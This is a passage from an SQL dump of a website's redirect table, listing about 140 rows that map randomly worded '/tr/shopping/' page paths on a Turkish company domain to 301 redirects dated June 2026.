00:00:00',301),(75121,'https://3s-technologies.com.tr/tr/shopping/njord/712150049.html',NULL,'https://3s-technologies.com.tr/shopping/njord/712150049.html','',1,0,'2026-06-11 07:18:36','0000-00-00 00:00:00',301),(75122,'https://3s-technologies.com.tr/tr/shopping/impostress/3912177048.html',NULL,'https://3s-technologies.com.tr/shopping/impostress/3912177048.html','',1,0,'2026-06-11 07:18:53','0000-00-00 00:00:00',301),(75123,'https://3s-technologies.com.tr/tr/shopping/estivate/4234727875.html',NULL,'https://3s-technologies.com.tr/shopping/estivate/4234727875.html','',1,0,'2026-06-11 07:18:55','0000-00-00 00:00:00',301),(75124,'https://3s-technologies.com.tr/tr/shopping/tacautac/3299399634.html',NULL,'https://3s-technologies.com.tr/shopping/tacautac/3299399634.html','',1,0,'2026-06-11 07:18:58','0000-00-00 00:00:00',301),(75125,'https://3s-technologies.com.tr/tr/shopping/cambist/144424795.html',NULL,'https://3s-technologies.com.tr/shopping/cambist/144424795.html','',1,0,'2026-06-11 07:19:01','0000-00-00 00:00:00',301),(75126,'https://3s-technologies.com.tr/tr/shopping/harlani/836421728.html',NULL,'https://3s-technologies.com.tr/shopping/harlani/836421728.html','',1,0,'2026-06-11 07:19:11','0000-00-00 00:00:00',301),(75127,'https://3s-technologies.com.tr/tr/shopping/sawbilled/2025215504.html',NULL,'https://3s-technologies.com.tr/shopping/sawbilled/2025215504.html','',1,0,'2026-06-11 07:19:13','0000-00-00 00:00:00',301),(75128,'https://3s-technologies.com.tr/tr/shopping/yellolegs/3576948962.html',NULL,'https://3s-technologies.com.tr/shopping/yellolegs/3576948962.html','',1,0,'2026-06-11 07:19:16','0000-00-00 00:00:00',301),(75129,'https://3s-technologies.com.tr/tr/shopping/brassicaceous/1167731112.html',NULL,'https://3s-technologies.com.tr/shopping/brassicaceous/1167731112.html','',1,0,'2026-06-11 07:19:19','0000-00-00 00:00:00',301),(75130,'https://3s-technologies.com.tr/tr/shopping/sagittarius/114744886.html',NULL,'https://3s-technologies.com.tr/shopping/sagittarius/114744886.html','',1,0,'2026-06-11 07:19:25','0000-00-00 00:00:00',301),(75131,'https://3s-technologies.com.tr/tr/shopping/mechani/2283010186.html',NULL,'https://3s-technologies.com.tr/shopping/mechani/2283010186.html','',1,0,'2026-06-11 07:19:28','0000-00-00 00:00:00',301),(75132,'https://3s-technologies.com.tr/tr/shopping/rurigenous/2429389246.html',NULL,'https://3s-technologies.com.tr/shopping/rurigenous/2429389246.html','',1,0,'2026-06-11 07:19:31','0000-00-00 00:00:00',301),(75133,'https://3s-technologies.com.tr/tr/shopping/endeavor/63778993.html',NULL,'https://3s-technologies.com.tr/shopping/endeavor/63778993.html','',1,0,'2026-06-11 07:19:34','0000-00-00 00:00:00',301),(75134,'https://3s-technologies.com.tr/tr/shopping/sophisticator/1328252060.html',NULL,'https://3s-technologies.com.tr/shopping/sophisticator/1328252060.html','',1,0,'2026-06-11 07:19:57','0000-00-00 00:00:00',301),(75135,'https://3s-technologies.com.tr/tr/shopping/swinecote/579767666.html',NULL,'https://3s-technologies.com.tr/shopping/swinecote/579767666.html','',1,0,'2026-06-11 07:19:59','0000-00-00 00:00:00',301),(75136,'https://3s-technologies.com.tr/tr/shopping/disavaunce/2915090877.html',NULL,'https://3s-technologies.com.tr/shopping/disavaunce/2915090877.html','',1,0,'2026-06-11 07:20:02','0000-00-00 00:00:00',301),(75137,'https://3s-technologies.com.tr/tr/shopping/irresistibly/2021675292.html',NULL,'https://3s-technologies.com.tr/shopping/irresistibly/2021675292.html','',1,0,'2026-06-11 07:20:05','0000-00-00 00:00:00',301),(75138,'https://3s-technologies.com.tr/tr/shopping/towering/2335348997.html',NULL,'https://3s-technologies.com.tr/shopping/towering/2335348997.html','',1,0,'2026-06-11 07:20:17','0000-00-00 00:00:00',301),(75139,'https://3s-technologies.com.tr/tr/shopping/oppignerate/1069751407.html',NULL,'https://3s-technologies.com.tr/shopping/oppignerate/1069751407.html','',1,0,'2026-06-11 07:20:19','0000-00-00 00:00:00',301),(75140,'https://3s-technologies.com.tr/tr/shopping/refreshingly/437670732.html',NULL,'https://3s-technologies.com.tr/shopping/refreshingly/437670732.html','',1,0,'2026-06-11 07:20:22','0000-00-00 00:00:00',301),(75141,'https://3s-technologies.com.tr/tr/shopping/immolate/3919859702.html',NULL,'https://3s-technologies.com.tr/shopping/immolate/3919859702.html','',1,0,'2026-06-11 07:20:25','0000-00-00 00:00:00',301),(75142,'https://3s-technologies.com.tr/tr/shopping/appointing/3819089306.html',NULL,'https://3s-technologies.com.tr/shopping/appointing/3819089306.html','',1,0,'2026-06-11 07:20:28','0000-00-00 00:00:00',301),(75143,'https://3s-technologies.com.tr/tr/shopping/bobac/2989751237.html',NULL,'https://3s-technologies.com.tr/shopping/bobac/2989751237.html','',1,0,'2026-06-11 07:20:31','0000-00-00 00:00:00',301),(75144,'https://3s-technologies.com.tr/tr/shopping/interpolable/3663345324.html',NULL,'https://3s-technologies.com.tr/shopping/interpolable/3663345324.html','',1,0,'2026-06-11 07:20:34','0000-00-00 00:00:00',301),(75145,'https://3s-technologies.com.tr/tr/shopping/conserver/411027105.html',NULL,'https://3s-technologies.com.tr/shopping/conserver/411027105.html','',1,0,'2026-06-11 07:20:37','0000-00-00 00:00:00',301),(75146,'https://3s-technologies.com.tr/tr/shopping/prelatically/20104638.html',NULL,'https://3s-technologies.com.tr/shopping/prelatically/20104638.html','',1,0,'2026-06-11 07:20:40','0000-00-00 00:00:00',301),(75147,'https://3s-technologies.com.tr/tr/shopping/commingler/972017277.html',NULL,'https://3s-technologies.com.tr/shopping/commingler/972017277.html','',1,0,'2026-06-11 07:20:43','0000-00-00 00:00:00',301),(75148,'https://3s-technologies.com.tr/tr/shopping/pasteurize/2402777576.html',NULL,'https://3s-technologies.com.tr/shopping/pasteurize/2402777576.html','',1,0,'2026-06-11 07:20:46','0000-00-00 00:00:00',301),(75149,'https://3s-technologies.com.tr/tr/shopping/brows/3822912341.html',NULL,'https://3s-technologies.com.tr/shopping/brows/3822912341.html','',1,0,'2026-06-11 07:20:49','0000-00-00 00:00:00',301),(75150,'https://3s-technologies.com.tr/tr/shopping/erratical/1698765686.html',NULL,'https://3s-technologies.com.tr/shopping/erratical/1698765686.html','',1,0,'2026-06-11 07:20:52','0000-00-00 00:00:00',301),(75151,'https://3s-technologies.com.tr/tr/shopping/thundering/75495796.html',NULL,'https://3s-technologies.com.tr/shopping/thundering/75495796.html','',1,0,'2026-06-11 07:20:55','0000-00-00 00:00:00',301),(75152,'https://3s-technologies.com.tr/tr/shopping/scripturalness/826590708.html',NULL,'https://3s-technologies.com.tr/shopping/scripturalness/826590708.html','',1,0,'2026-06-11 07:20:58','0000-00-00 00:00:00',301),(75153,'https://3s-technologies.com.tr/tr/shopping/multiphase/437549020.html',NULL,'https://3s-technologies.com.tr/shopping/multiphase/437549020.html','',1,0,'2026-06-11 07:21:01','0000-00-00 00:00:00',301),(75154,'https://3s-technologies.com.tr/tr/shopping/multangularness/1447974026.html',NULL,'https://3s-technologies.com.tr/shopping/multangularness/1447974026.html','',1,0,'2026-06-11 07:21:04','0000-00-00 00:00:00',301),(75155,'https://3s-technologies.com.tr/tr/shopping/hamstringing/3676672965.html',NULL,'https://3s-technologies.com.tr/shopping/hamstringing/3676672965.html','',1,0,'2026-06-11 07:21:07','0000-00-00 00:00:00',301),(75156,'https://3s-technologies.com.tr/tr/shopping/deviling/856748920.html',NULL,'https://3s-technologies.com.tr/shopping/deviling/856748920.html','',1,0,'2026-06-11 07:21:10','0000-00-00 00:00:00',301),(75157,'https://3s-technologies.com.tr/tr/shopping/mordicative/2814800983.html',NULL,'https://3s-technologies.com.tr/shopping/mordicative/2814800983.html','',1,0,'2026-06-11 07:21:13','0000-00-00 00:00:00',301),(75158,'https://3s-technologies.com.tr/tr/shopping/equangular/1757513420.html',NULL,'https://3s-technologies.com.tr/shopping/equangular/1757513420.html','',1,0,'2026-06-11 07:21:16','0000-00-00 00:00:00',301),(75159,'https://3s-technologies.com.tr/tr/shopping/sonorously/4012935874.html',NULL,'https://3s-technologies.com.tr/shopping/sonorously/4012935874.html','',1,0,'2026-06-11 07:21:24','0000-00-00 00:00:00',301),(75160,'https://3s-technologies.com.tr/tr/shopping/linch/3972224464.html',NULL,'https://3s-technologies.com.tr/shopping/linch/3972224464.html','',1,0,'2026-06-11 07:21:27','0000-00-00 00:00:00',301),(75161,'https://3s-technologies.com.tr/tr/shopping/brangling/1914450565.html',NULL,'https://3s-technologies.com.tr/shopping/brangling/1914450565.html','',1,0,'2026-06-11 07:21:30','0000-00-00 00:00:00',301),(75162,'https://3s-technologies.com.tr/tr/shopping/burrower/2119968093.html',NULL,'https://3s-technologies.com.tr/shopping/burrower/2119968093.html','',1,0,'2026-06-11 07:21:33','0000-00-00 00:00:00',301),(75163,'https://3s-technologies.com.tr/tr/shopping/capaciousness/1366704994.html',NULL,'https://3s-technologies.com.tr/shopping/capaciousness/1366704994.html','',1,0,'2026-06-11 07:21:36','0000-00-00 00:00:00',301),(75164,'https://3s-technologies.com.tr/tr/shopping/underfaction/4261297397.html',NULL,'https://3s-technologies.com.tr/shopping/underfaction/4261297397.html','',1,0,'2026-06-11 07:21:39','0000-00-00 00:00:00',301),(75165,'https://3s-technologies.com.tr/tr/shopping/overearnestness/440445175.html',NULL,'https://3s-technologies.com.tr/shopping/overearnestness/440445175.html','',1,0,'2026-06-11 07:21:42','0000-00-00 00:00:00',301),(75166,'https://3s-technologies.com.tr/tr/shopping/hangbies/290235765.html',NULL,'https://3s-technologies.com.tr/shopping/hangbies/290235765.html','',1,0,'2026-06-11 07:21:45','0000-00-00 00:00:00',301),(75167,'https://3s-technologies.com.tr/tr/shopping/underwing/12456156.html',NULL,'https://3s-technologies.com.tr/shopping/underwing/12456156.html','',1,0,'2026-06-11 07:21:48','0000-00-00 00:00:00',301),(75168,'https://3s-technologies.com.tr/tr/shopping/auditory/3860550609.html',NULL,'https://3s-technologies.com.tr/shopping/auditory/3860550609.html','',1,0,'2026-06-11 07:21:51','0000-00-00 00:00:00',301),(75169,'https://3s-technologies.com.tr/tr/shopping/strict/3250368018.html',NULL,'https://3s-technologies.com.tr/shopping/strict/3250368018.html','',1,0,'2026-06-11 07:21:54','0000-00-00 00:00:00',301),(75170,'https://3s-technologies.com.tr/tr/shopping/bodes/342413789.html',NULL,'https://3s-technologies.com.tr/shopping/bodes/342413789.html','',1,0,'2026-06-11 07:21:57','0000-00-00 00:00:00',301),(75171,'https://3s-technologies.com.tr/tr/shopping/pranced/3370821581.html',NULL,'https://3s-technologies.com.tr/shopping/pranced/3370821581.html','',1,0,'2026-06-11 07:22:00','0000-00-00 00:00:00',301),(75172,'https://3s-technologies.com.tr/tr/shopping/flareup/1748388370.html',NULL,'https://3s-technologies.com.tr/shopping/flareup/1748388370.html','',1,0,'2026-06-11 07:22:03','0000-00-00 00:00:00',301),(75173,'https://3s-technologies.com.tr/tr/shopping/threste/3577429464.html',NULL,'https://3s-technologies.com.tr/shopping/threste/3577429464.html','',1,0,'2026-06-11 07:22:06','0000-00-00 00:00:00',301),(75174,'https://3s-technologies.com.tr/tr/shopping/cognizable/1386388161.html',NULL,'https://3s-technologies.com.tr/shopping/cognizable/1386388161.html','',1,0,'2026-06-11 07:22:09','0000-00-00 00:00:00',301),(75175,'https://3s-technologies.com.tr/tr/shopping/computist/190962719.html',NULL,'https://3s-technologies.com.tr/shopping/computist/190962719.html','',1,0,'2026-06-11 07:22:12','0000-00-00 00:00:00',301),(75176,'https://3s-technologies.com.tr/tr/shopping/fubby/889201966.html',NULL,'https://3s-technologies.com.tr/shopping/fubby/889201966.html','',1,0,'2026-06-11 07:22:15','0000-00-00 00:00:00',301),(75177,'https://3s-technologies.com.tr/tr/shopping/complained/3349150708.html',NULL,'https://3s-technologies.com.tr/shopping/complained/3349150708.html','',1,0,'2026-06-11 07:22:18','0000-00-00 00:00:00',301),(75178,'https://3s-technologies.com.tr/tr/shopping/analogically/3018004847.html',NULL,'https://3s-technologies.com.tr/shopping/analogically/3018004847.html','',1,0,'2026-06-11 07:22:21','0000-00-00 00:00:00',301),(75179,'https://3s-technologies.com.tr/tr/shopping/motioner/2263273622.html',NULL,'https://3s-technologies.com.tr/shopping/motioner/2263273622.html','',1,0,'2026-06-11 07:22:24','0000-00-00 00:00:00',301),(75180,'https://3s-technologies.com.tr/tr/shopping/triandria/3733223728.html',NULL,'https://3s-technologies.com.tr/shopping/triandria/3733223728.html','',1,0,'2026-06-11 07:22:27','0000-00-00 00:00:00',301),(75181,'https://3s-technologies.com.tr/tr/shopping/servient/1244556094.html',NULL,'https://3s-technologies.com.tr/shopping/servient/1244556094.html','',1,0,'2026-06-11 07:22:30','0000-00-00 00:00:00',301),(75182,'https://3s-technologies.com.tr/tr/shopping/lemmas/2431367082.html',NULL,'https://3s-technologies.com.tr/shopping/lemmas/2431367082.html','',1,0,'2026-06-11 07:22:33','0000-00-00 00:00:00',301),(75183,'https://3s-technologies.com.tr/tr/shopping/stenography/83668355.html',NULL,'https://3s-technologies.com.tr/shopping/stenography/83668355.html','',1,0,'2026-06-11 07:22:39','0000-00-00 00:00:00',301),(75184,'https://3s-technologies.com.tr/tr/shopping/bedyeing/3546268450.html',NULL,'https://3s-technologies.com.tr/shopping/bedyeing/3546268450.html','',1,0,'2026-06-11 07:22:41','0000-00-00 00:00:00',301),(75185,'https://3s-technologies.com.tr/tr/shopping/outrageously/655000595.html',NULL,'https://3s-technologies.com.tr/shopping/outrageously/655000595.html','',1,0,'2026-06-11 07:22:43','0000-00-00 00:00:00',301),(75186,'https://3s-technologies.com.tr/tr/shopping/slaughterously/1848383159.html',NULL,'https://3s-technologies.com.tr/shopping/slaughterously/1848383159.html','',1,0,'2026-06-11 07:22:47','0000-00-00 00:00:00',301),(75187,'https://3s-technologies.com.tr/tr/shopping/similes/245141794.html',NULL,'https://3s-technologies.com.tr/shopping/similes/245141794.html','',1,0,'2026-06-11 07:22:50','0000-00-00 00:00:00',301),(75188,'https://3s-technologies.com.tr/tr/shopping/pyrogallic/1782044967.html',NULL,'https://3s-technologies.com.tr/shopping/pyrogallic/1782044967.html','',1,0,'2026-06-11 07:22:53','0000-00-00 00:00:00',301),(75189,'https://3s-technologies.com.tr/tr/shopping/beatifying/767414592.html',NULL,'https://3s-technologies.com.tr/shopping/beatifying/767414592.html','',1,0,'2026-06-11 07:22:56','0000-00-00 00:00:00',301),(75190,'https://3s-technologies.com.tr/tr/shopping/bluffy/2526607828.html',NULL,'https://3s-technologies.com.tr/shopping/bluffy/2526607828.html','',1,0,'2026-06-11 07:22:59','0000-00-00 00:00:00',301),(75191,'https://3s-technologies.com.tr/tr/shopping/errata/341201674.html',NULL,'https://3s-technologies.com.tr/shopping/errata/341201674.html','',1,0,'2026-06-11 07:23:02','0000-00-00 00:00:00',301),(75192,'https://3s-technologies.com.tr/tr/shopping/militarization/181414522.html',NULL,'https://3s-technologies.com.tr/shopping/militarization/181414522.html','',1,0,'2026-06-11 07:23:05','0000-00-00 00:00:00',301),(75193,'https://3s-technologies.com.tr/tr/shopping/runningly/852118337.html',NULL,'https://3s-technologies.com.tr/shopping/runningly/852118337.html','',1,0,'2026-06-11 07:23:08','0000-00-00 00:00:00',301),(75194,'https://3s-technologies.com.tr/tr/shopping/litigiousness/2425444483.html',NULL,'https://3s-technologies.com.tr/shopping/litigiousness/2425444483.html','',1,0,'2026-06-11 07:23:11','0000-00-00 00:00:00',301),(75195,'https://3s-technologies.com.tr/tr/shopping/selectness/2830442404.html',NULL,'https://3s-technologies.com.tr/shopping/selectness/2830442404.html','',1,0,'2026-06-11 07:23:14','0000-00-00 00:00:00',301),(75196,'https://3s-technologies.com.tr/tr/shopping/suncup/4110244195.html',NULL,'https://3s-technologies.com.tr/shopping/suncup/4110244195.html','',1,0,'2026-06-11 07:23:17','0000-00-00 00:00:00',301),(75197,'https://3s-technologies.com.tr/tr/shopping/cervulus/787219471.html',NULL,'https://3s-technologies.com.tr/shopping/cervulus/787219471.html','',1,0,'2026-06-11 07:23:20','0000-00-00 00:00:00',301),(75198,'https://3s-technologies.com.tr/tr/shopping/orgasm/654004561.html',NULL,'https://3s-technologies.com.tr/shopping/orgasm/654004561.html','',1,0,'2026-06-11 07:23:23','0000-00-00 00:00:00',301),(75199,'https://3s-technologies.com.tr/tr/shopping/commonest/1532888901.html',NULL,'https://3s-technologies.com.tr/shopping/commonest/1532888901.html','',1,0,'2026-06-11 07:23:26','0000-00-00 00:00:00',301),(75200,'https://3s-technologies.com.tr/tr/shopping/cavin/4240082432.html',NULL,'https://3s-technologies.com.tr/shopping/cavin/4240082432.html','',1,0,'2026-06-11 07:23:29','0000-00-00 00:00:00',301),(75201,'https://3s-technologies.com.tr/tr/shopping/doublebanked/2359455246.html',NULL,'https://3s-technologies.com.tr/shopping/doublebanked/2359455246.html','',1,0,'2026-06-11 07:23:32','0000-00-00 00:00:00',301),(75202,'https://3s-technologies.com.tr/tr/shopping/nonreturnable/2745207814.html',NULL,'https://3s-technologies.com.tr/shopping/nonreturnable/2745207814.html','',1,0,'2026-06-11 07:23:35','0000-00-00 00:00:00',301),(75203,'https://3s-technologies.com.tr/tr/shopping/multinominal/3906934848.html',NULL,'https://3s-technologies.com.tr/shopping/multinominal/3906934848.html','',1,0,'2026-06-11 07:23:38','0000-00-00 00:00:00',301),(75204,'https://3s-technologies.com.tr/tr/shopping/planeparallel/2543355733.html',NULL,'https://3s-technologies.com.tr/shopping/planeparallel/2543355733.html','',1,0,'2026-06-11 07:23:41','0000-00-00 00:00:00',301),(75205,'https://3s-technologies.com.tr/tr/shopping/stapler/3046578156.html',NULL,'https://3s-technologies.com.tr/shopping/stapler/3046578156.html','',1,0,'2026-06-11 07:23:44','0000-00-00 00:00:00',301),(75206,'https://3s-technologies.com.tr/tr/shopping/splintery/2448071428.html',NULL,'https://3s-technologies.com.tr/shopping/splintery/2448071428.html','',1,0,'2026-06-11 07:23:47','0000-00-00 00:00:00',301),(75207,'https://3s-technologies.com.tr/tr/shopping/conglobating/2936466645.html',NULL,'https://3s-technologies.com.tr/shopping/conglobating/2936466645.html','',1,0,'2026-06-11 07:23:52','0000-00-00 00:00:00',301),(75208,'https://3s-technologies.com.tr/tr/shopping/techno/1627597030.html',NULL,'https://3s-technologies.com.tr/shopping/techno/1627597030.html','',1,0,'2026-06-11 07:23:57','0000-00-00 00:00:00',301),(75209,'https://3s-technologies.com.tr/tr/shopping/hypocrisy/1779457262.html',NULL,'https://3s-technologies.com.tr/shopping/hypocrisy/1779457262.html','',1,0,'2026-06-11 07:24:00','0000-00-00 00:00:00',301),(75210,'https://3s-technologies.com.tr/tr/shopping/accombination/1978619264.html',NULL,'https://3s-technologies.com.tr/shopping/accombination/1978619264.html','',1,0,'2026-06-11 07:24:03','0000-00-00 00:00:00',301),(75211,'https://3s-technologies.com.tr/tr/shopping/decantate/3214137685.html',NULL,'https://3s-technologies.com.tr/shopping/decantate/3214137685.html','',1,0,'2026-06-11 07:24:06','0000-00-00 00:00:00',301),(75212,'https://3s-technologies.com.tr/tr/shopping/histonomy/3504036491.html',NULL,'https://3s-technologies.com.tr/shopping/histonomy/3504036491.html','',1,0,'2026-06-11 07:24:09','0000-00-00 00:00:00',301),(75213,'https://3s-technologies.com.tr/tr/shopping/conite/2259775221.html',NULL,'https://3s-technologies.com.tr/shopping/conite/2259775221.html','',1,0,'2026-06-11 07:24:12','0000-00-00 00:00:00',301),(75214,'https://3s-technologies.com.tr/tr/shopping/appetizer/3871103807.html',NULL,'https://3s-technologies.com.tr/shopping/appetizer/3871103807.html','',1,0,'2026-06-11 07:24:15','0000-00-00 00:00:00',301),(75215,'https://3s-technologies.com.tr/tr/shopping/gnide/2231825158.html',NULL,'https://3s-technologies.com.tr/shopping/gnide/2231825158.html','',1,0,'2026-06-11 07:24:18','0000-00-00 00:00:00',301),(75216,'https://3s-technologies.com.tr/tr/shopping/sublimification/1149324762.html',NULL,'https://3s-technologies.com.tr/shopping/sublimification/1149324762.html','',1,0,'2026-06-11 07:24:21','0000-00-00 00:00:00',301),(75217,'https://3s-technologies.com.tr/tr/shopping/beard/566555054.html',NULL,'https://3s-technologies.com.tr/shopping/beard/566555054.html','',1,0,'2026-06-11 07:24:24','0000-00-00 00:00:00',301),(75218,'https://3s-technologies.com.tr/tr/shopping/secludedly/3685935911.html',NULL,'https://3s-technologies.com.tr/shopping/secludedly/3685935911.html','',1,0,'2026-06-11 07:24:27','0000-00-00 00:00:00',301),(75219,'https://3s-technologies.com.tr/tr/shopping/ablush/29204061.html',NULL,'https://3s-technologies.com.tr/shopping/ablush/29204061.html','',1,0,'2026-06-11 07:24:30','0000-00-00 00:00:00',301),(75220,'https://3s-technologies.com.tr/tr/shopping/alter/1401760444.html',NULL,'https://3s-technologies.com.tr/shopping/alter/1401760444.html','',1,0,'2026-06-11 07:24:33','0000-00-00 00:00:00',301),(75221,'https://3s-technologies.com.tr/tr/shopping/damage/1594516609.html',NULL,'https://3s-technologies.com.tr/shopping/damage/1594516609.html','',1,0,'2026-06-11 07:24:36','0000-00-00 00:00:00',301),(75222,'https://3s-technologies.com.tr/tr/shopping/rigorousness/1459764950.html',NULL,'https://3s-technologies.com.tr/shopping/rigorousness/1459764950.html','',1,0,'2026-06-11 07:24:39','0000-00-00 00:00:00',301),(75223,'https://3s-technologies.com.tr/tr/shopping/obfirmation/2003054726.html',NULL,'https://3s-technologies.com.tr/shopping/obfirmation/2003054726.html','',1,0,'2026-06-11 07:24:42','0000-00-00 00:00:00',301),(75224,'https://3s-technologies.com.tr/tr/shopping/melain/4132013799.html',NULL,'https://3s-technologies.com.tr/shopping/melain/4132013799.html','',1,0,'2026-06-11 07:24:45','0000-00-00 00:00:00',301),(75225,'https://3s-technologies.com.tr/tr/shopping/antic/2549441871.html',NULL,'https://3s-technologies.com.tr/shopping/antic/2549441871.html','',1,0,'2026-06-11 07:24:48','0000-00-00 00:00:00',301),(75226,'https://3s-technologies.com.tr/tr/shopping/myodynamometer/2660269100.html',NULL,'https://3s-technologies.com.tr/shopping/myodynamometer/2660269100.html','',1,0,'2026-06-11 07:24:51','0000-00-00 00:00:00',301),(75227,'https://3s-technologies.com.tr/tr/shopping/blushet/174214814.html',NULL,'https://3s-technologies.com.tr/shopping/blushet/174214814.html','',1,0,'2026-06-11 07:24:54','0000-00-00 00:00:00',301),(75228,'https://3s-technologies.com.tr/tr/shopping/harmoniphon/1114803243.html',NULL,'https://3s-technologies.com.tr/shopping/harmoniphon/1114803243.html','',1,0,'2026-06-11 07:24:57','0000-00-00 00:00:00',301),(75229,'https://3s-technologies.com.tr/tr/shopping/lowclass/1657955107.html',NULL,'https://3s-technologies.com.tr/shopping/lowclass/1657955107.html','',1,0,'2026-06-11 07:25:00','0000-00-00 00:00:00',301),(75230,'https://3s-technologies.com.tr/tr/shopping/fluorous/2562373843.html',NULL,'https://3s-technologies.com.tr/shopping/fluorous/2562373843.html','',1,0,'2026-06-11 07:25:03','0000-00-00 00:00:00',301),(75231,'https://3s-technologies.com.tr/tr/shopping/factory/3615194363.html',NULL,'https://3s-technologies.com.tr/shopping/factory/3615194363.html','',1,0,'2026-06-11 07:25:10','0000-00-00 00:00:00',301),(75232,'https://3s-technologies.com.tr/tr/shopping/fleece/4087134028.html',NULL,'https://3s-technologies.com.tr/shopping/fleece/4087134028.html','',1,0,'2026-06-11 07:25:12','0000-00-00 00:00:00',301),(75233,'https://3s-technologies.com.tr/tr/shopping/prowlingly/2353490820.html',NULL,'https://3s-technologies.com.tr/shopping/prowlingly/2353490820.html','',1,0,'2026-06-11 07:25:15','0000-00-00 00:00:00',301),(75234,'https://3s-technologies.com.tr/tr/shopping/beefeater/4188067947.html',NULL,'https://3s-technologies.com.tr/shopping/beefeater/4188067947.html','',1,0,'2026-06-11 07:25:18','0000-00-00 00:00:00',301),(75235,'https://3s-technologies.com.tr/tr/shopping/polygamian/978414582.html',NULL,'https://3s-technologies.com.tr/shopping/polygamian/978414582.html','',1,0,'2026-06-11 07:25:21','0000-00-00 00:00:00',301),(75236,'https://3s-technologies.com.tr/tr/shopping/prolapse/557429988.html',NULL,'https://3s-technologies.com.tr/shopping/prolapse/557429988.html','',1,0,'2026-06-11 07:25:24','0000-00-00 00:00:00',301),(75237,'https://3s-technologies.com.tr/tr/shopping/temper/3282046779.html',NULL,'https://3s-technologies.com.tr/shopping/temper/3282046779.html','',1,0,'2026-06-11 07:25:27','0000-00-00 00:00:00',301),(75238,'https://3s-technologies.com.tr/tr/shopping/melampode/1539299657.html',NULL,'https://3s-technologies.com.tr/shopping/melampode/1539299657.html','',1,0,'2026-06-11 07:25:30','0000-00-00 00:00:00',301),(75239,'https://3s-technologies.com.tr/tr/shopping/sindoc/296321903.html',NULL,'https://3s-technologies.com.tr/shopping/sindoc/296321903.html','',1,0,'2026-06-11 07:25:33','0000-00-00 00:00:00',301),(75240,'https://3s-technologies.com.tr/tr/shopping/custodes/3441912068.html',NULL,'https://3s-technologies.com.tr/shopping/custodes/3441912068.html','',1,0,'2026-06-11 07:25:36','0000-00-00 00:00:00',301),(75241,'https://3s-technologies.com.tr/tr/shopping/reasoner/797959407.html',NULL,'https://3s-technologies.com.tr/shopping/reasoner/797959407.html','',1,0,'2026-06-11 07:25:39','0000-00-00 00:00:00',301),(75242,'https://3s-technologies.com.tr/tr/shopping/tocher/3126745623.html',NULL,'https://3s-technologies.com.tr/shopping/tocher/3126745623.html','',1,0,'2026-06-11 07:25:42','0000-00-00 00:00:00',301),(75243,'https://3s-technologies.com.tr/tr/shopping/marestail/3500538074.html',NULL,'https://3s-technologies.com.tr/shopping/marestail/3500538074.html','',1,0,'2026-06-11 07:25:45','0000-00-00 00:00:00',301),(75244,'https://3s-technologies.com.tr/tr/shopping/amicableness/1637059857.html',NULL,'https://3s-technologies.com.tr/shopping/amicableness/1637059857.html','',1,0,'2026-06-11 07:25:48','0000-00-00 00:00:00',301),(75245,'https://3s-technologies.com.tr/tr/shopping/diversities/791971766.html',NULL,'https://3s-technologies.com.tr/shopping/diversities/791971766.html','',1,0,'2026-06-11 07:25:51','0000-00-00 00:00:00',301),(75246,'https://3s-technologies.com.tr/tr/shopping/fortify/2691263100.html',NULL,'https://3s-technologies.com.tr/shopping/fortify/2691263100.html','',1,0,'2026-06-11 07:25:54','0000-00-00 00:00:00',301),(75247,'https://3s-technologies.com.tr/tr/shopping/harmonicus/2772569040.html',NULL,'https://3s-technologies.com.tr/shopping/harmonicus/2772569040.html','',1,0,'2026-06-11 07:25:57','0000-00-00 00:00:00',301),(75248,'https://3s-technologies.com.tr/tr/shopping/dunker/2256356737.html',NULL,'https://3s-technologies.com.tr/shopping/dunker/2256356737.html','',1,0,'2026-06-11 07:26:00','0000-00-00 00:00:00',301),(75249,'https://3s-technologies.com.tr/tr/shopping/adjourn/3771983340.html',NULL,'https://3s-technologies.com.tr/shopping/adjourn/3771983340.html','',1,0,'2026-06-11 07:26:03','0000-00-00 00:00:00',301),(75250,'https://3s-technologies.com.tr/tr/shopping/clustered/4092332685.html',NULL,'https://3s-technologies.com.tr/shopping/clustered/4092332685.html','',1,0,'2026-06-11 07:26:06','0000-00-00 00:00:00',301),(75251,'https://3s-technologies.com.tr/tr/shopping/thereon/2859913016.html',NULL,'https://3s-technologies.com.tr/shopping/thereon/2859913016.html','',1,0,'2026-06-11 07:26:09','0000-00-00 00:00:00',301),(75252,'https://3s-technologies.com.tr/tr/shopping/wends/1177842883.html',NULL,'https://3s-technologies.com.tr/shopping/wends/1177842883.html','',1,0,'2026-06-11 07:26:12','0000-00-00 00:00:00',301),(75253,'https://3s-technologies.com.tr/tr/shopping/mischievousness/3510447247.html',NULL,'https://3s-technologies.com.tr/shopping/mischievousness/3510447247.html','',1,0,'2026-06-11 07:26:15','0000-00-00 00:00:00',301),(75254,'https://3s-technologies.com.tr/tr/shopping/mulch/905906296.html',NULL,'https://3s-technologies.com.tr/shopping/mulch/905906296.html','',1,0,'2026-06-11 07:26:18','0000-00-00 00:00:00',301),(75255,'https://3s-technologies.com.tr/tr/shopping/rapeful/2048877574.html',NULL,'https://3s-technologies.com.tr/shopping/rapeful/2048877574.html','',1,0,'2026-06-11 07:26:24','0000-00-00 00:00:00',301),(75256,'https://3s-technologies.com.tr/tr/shopping/drawn/711418452.html',NULL,'https://3s-technologies.com.tr/shopping/drawn/711418452.html','',1,0,'2026-06-11 07:26:26','0000-00-00 00:00:00',301),(75257,'https://3s-technologies.com.tr/tr/shopping/roisterly/3139548797.html',NULL,'https://3s-technologies.com.tr/shopping/roisterly/3139548797.html','',1,0,'2026-06-11 07:26:29','0000-00-00 00:00:00',301),(75258,'https://3s-technologies.com.tr/tr/shopping/rubrum/193005597.html',NULL,'https://3s-technologies.com.tr/shopping/rubrum/193005597.html','',1,0,'2026-06-11 07:26:33','0000-00-00 00:00:00',301),(75259,'https://3s-technologies.com.tr/tr/shopping/sheely/2688366929.html',NULL,'https://3s-technologies.com.tr/shopping/sheely/2688366929.html','',1,0,'2026-06-11 07:26:35','0000-00-00 00:00:00',301),(75260,'https://3s-technologies.com.tr/tr/shopping/justify/2450928537.html',NULL,'https://3s-technologies.com.tr/shopping/justify/2450928537.html','',1,0,'2026-06-11 07:26:38','0000-00-00 00:00:00',301),(75261,'https://3s-technologies.com.tr/tr/shopping/impenetrable/2136594286.html',NULL,'https://3s-technologies.com.tr/shopping/impenetrable/2136594286.html','',1,0,'2026-06-11 07:26:41','0000-00-00 00:00:00',301),(75262,'https://3s-technologies.com.tr/tr/shopping/gerocomical/405226202.html',NULL,'https://3s-technologies.com.tr/shopping/gerocomical/405226202.html','',1,0,'2026-06-11 07:26:44','0000-00-00 